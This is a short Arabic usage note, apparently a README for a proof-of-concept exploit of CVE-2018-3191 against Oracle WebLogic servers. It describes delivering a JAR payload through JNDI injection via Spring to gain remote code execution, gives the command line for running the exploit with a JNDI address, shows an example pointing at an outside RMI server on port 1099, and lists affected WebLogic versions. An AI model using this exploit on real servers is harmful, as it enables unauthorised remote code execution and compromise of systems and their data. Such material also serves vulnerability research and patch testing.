
إثبات مفهوم لاستغلال CVE-2018-3191 يستهدف خادم WebLogic عبر حقن JNDI. يقوم بتسليم حمولة JAR لتفعيل تنفيذ التعليمات البرمجية عن بُعد عبر Spring JNDI.
الاستخدام:
java -jar weblogic-spring-jndi.jar <jndi_address>
مثال:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
ملاحظة:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1